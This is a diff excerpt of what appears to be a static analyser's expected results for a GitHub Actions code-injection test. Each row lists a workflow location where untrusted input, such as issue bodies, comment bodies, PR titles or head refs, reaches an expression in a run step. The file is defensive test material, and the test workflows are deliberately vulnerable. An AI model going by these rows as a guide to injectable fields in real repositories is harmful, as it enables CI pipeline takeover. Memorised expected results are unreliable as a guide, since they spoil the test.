.github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | +| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning7.yml | +| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning8.yml | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | .github/workflows/composite-action-caller-4.yml | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | .github/workflows/image_link_generator.yml | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | .github/workflows/level1.yml | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | 